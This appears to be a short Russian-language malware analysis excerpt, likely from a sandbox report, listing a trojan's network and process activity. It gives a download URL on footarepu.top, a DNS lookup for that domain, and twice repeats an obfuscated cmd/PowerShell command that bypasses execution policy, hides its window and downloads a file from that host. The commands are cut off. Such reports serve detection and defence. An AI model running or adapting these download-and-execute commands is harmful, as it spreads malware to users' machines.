Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owE^RSHeL^l.^Exe^ ^-e^X^e^CUti^on^p^OLIcy^ ^Bypa^Ss -NoPRo^f^IlE^ -^WiN^dOW^stY^lE H^iDde^N^ ^(^n^eW^-^OB^J^e^c^t ^sY^StEM.N^E^T^.WeBc^liEnT^).d^o^w^nL^OAd^FilE^(^'http://foot...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "p^owE^RSHeL^l.^Exe^ ^-e^X^e^CUti^on^p^OLIcy^ ^Bypa^Ss -NoPRo^f^IlE^ -^WiN^dOW^stY^lE H^iDde^N^ ^(^n^eW^-^OB^J^e^c^t ^sY^StEM.N^E^T^.WeBc^liEnT^).d^o^w^nL^OAd^FilE^(^'http://foot...' (со скрытым окном)